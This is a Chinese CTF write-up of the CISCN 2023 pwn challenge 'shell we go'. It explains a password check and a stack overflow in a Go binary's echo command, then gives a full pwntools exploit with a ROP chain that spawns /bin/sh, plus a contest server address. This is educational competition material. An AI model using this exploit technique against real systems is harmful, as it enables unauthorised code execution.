ciscn 2023 初赛 pwn shell we go

ciscn 2023 初赛 pwn shell we go

这题go pwn，符号恢复就恢复很长时间了，网上的插件好多都没用

根着流程，可以看到这里有一个验证，以空格来分割，第一个参数会验证是否为nAcDsMicN
如果第一个参数验证通过，进入判断

右边的4c14a0是一个重要的处理函数

如果go符号恢复之后就可以直接发现是一个rc4解密

解密之后得到密码，判断密码是否为S33UAga1n@#!，如果是的则进入另一个处理流程

上面验证成功之后可以用echo，这里的echo重写了一下，跟进4c1720

漏洞点就出在这里，发现echo a b会变成ab，echo a + b为a，如果echo 'a' * 0x100 'b' * 0x200，这个时候会发生一个crash

经过调试之后发现是由于下面的unk_func0b04:这里的地址被覆盖成了垃圾数据
这个时候就需要用到+号，可以看到上面有一个判断是判断是否为+，如果为+则i++继续，所以就可以避免把一些重要的地址给覆盖掉，最后可以控制ret，一套rop即可

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote('123.57.248.214', 27344)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def dbgg():
    raw_input()

dbgg()

r.sendline('cert nAcDsMicN S33UAga1n@#!')

p1 = b'echo ' + b'a' * 0x100 + b' ' + b'b' * 0x103 + b"+" * 24 + b'c' * 8
pop_rdi_ret = 0x0000000000444fec
pop_rsi_ret = 0x000000000041e818
pop_rdx_ret = 0x000000000049e11d
pop_rax_ret = 0x000000000040d9e6
syscall = 0x000000000040328c

p1 += p64(pop_rdi_ret) + p64(0) + p64(pop_rsi_ret) + p64(0x5B0644) + p64(pop_rdx_ret) + p64(0x50) + p64(pop_rax_ret) + p64(0) + p64(syscall)
p1 += p64(pop_rdi_ret) + p64(0x5B0644) + p64(pop_rsi_ret) + p64(0) + p64(pop_rdx_ret) + p64(0) + p64(pop_rax_ret) + p64(0x3b) + p64(syscall)

r.sendlineafter('nightingale# ', p1)
r.sendline('/bin/sh\x00')

r.interactive()